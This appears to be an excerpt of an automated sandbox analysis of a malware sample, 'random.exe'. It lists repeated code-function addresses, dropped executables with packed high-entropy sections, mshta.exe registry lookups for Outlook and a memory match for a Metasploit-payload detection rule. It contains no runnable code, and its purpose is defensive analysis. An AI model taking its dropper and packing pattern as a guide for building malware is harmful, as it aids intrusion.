Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: String function: 6C569F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: String function: 6C48C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: String function: 6C453620 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: String function: 6C459B10 appears 109 times

Source: cBeNU75[1].exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75[1].exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75[1].exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75[1].exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75[1].exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75.exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75.exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75.exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75.exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: cBeNU75.exe.11.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000035.00000002.2949636350.000000000A390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: random.exe	Static PE information: Section: ZLIB complexity 1.0003621295592706
Source: random.exe	Static PE information: Section: ixwuewww ZLIB complexity 0.9948372772616509
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: Section: exzbwtwb ZLIB complexity 0.9944711629268661
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: Section: wskuzfvh ZLIB complexity 0.9942117439061089
Source: skotes.exe.3.dr	Static PE information: Section: wskuzfvh ZLIB complexity 0.9942117439061089
Source: random[1].exe0.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: b33114b970.exe.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[2].exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[2].exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 095fb861eb.exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 095fb861eb.exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[1].exe1.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 07ab034c92.exe.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[2].exe0.11.dr	Static PE information: Section: ZLIB complexity 0.995700698757764
Source: random[2].exe0.11.dr	Static PE information: Section: cwmuvuvv ZLIB complexity 0.994428589489062
Source: ede25bd9a2.exe.11.dr	Static PE information: Section: ZLIB complexity 0.995700698757764
Source: ede25bd9a2.exe.11.dr	Static PE information: Section: cwmuvuvv ZLIB complexity 0.994428589489062
Source: random[2].exe1.11.dr	Static PE information: Section: ZLIB complexity 1.0003142251577286
Source: random[2].exe1.11.dr	Static PE information: Section: ifqcqdxm ZLIB complexity 0.9945899191154646
Source: 298e6cea90.exe.11.dr	Static PE information: Section: ZLIB complexity 1.0003142251577286
Source: 298e6cea90.exe.11.dr	Static PE information: Section: ifqcqdxm ZLIB complexity 0.9945899191154646
Source: 1AWhJsY[1].exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1AWhJsY[1].exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1AWhJsY.exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1AWhJsY.exe.11.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9983834134615385
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: Section: bhaywimc ZLIB complexity 0.9944881206870687
Source: 7fOMOTQ.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9983834134615385
Source: 7fOMOTQ.exe.11.dr	Static PE information: Section: bhaywimc ZLIB complexity 0.9944881206870687
Source: Fe36XBk[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk[1].exe.11.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
Source: Fe36XBk.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk.exe.11.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
Source: Bjkm5hE[1].exe.11.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE[1].exe.11.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: Bjkm5hE.exe.11.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE.exe.11.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: random[2].exe2.11.dr	Static PE information: Section: ZLIB complexity 0.9967130335365854
Source: random[2].exe2.11.dr	Static PE information: Section: stywrpjp ZLIB complexity 0.9949050641538237
